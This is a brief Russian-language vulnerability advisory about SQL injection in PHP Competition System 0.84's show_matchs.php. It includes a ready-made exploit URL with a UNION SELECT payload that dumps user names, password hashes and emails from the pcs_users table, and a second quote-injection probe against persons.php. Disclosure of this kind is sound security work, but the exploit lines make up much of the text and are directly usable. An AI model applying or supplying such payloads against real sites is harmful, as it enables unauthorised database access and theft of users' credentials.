Программа: PHP Competition System 0.84

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «competition» сценарием show_matchs.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

www.TraGeT.CoM/PATH/show_matchs.php?competition=1&season=1&day=-1+union+select+0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,name,passwd,email),
0,0,0,0+from+pcs_users—

www.TraGeT.CoM/PATH/persons.php?pageno=0′



Оставить мнение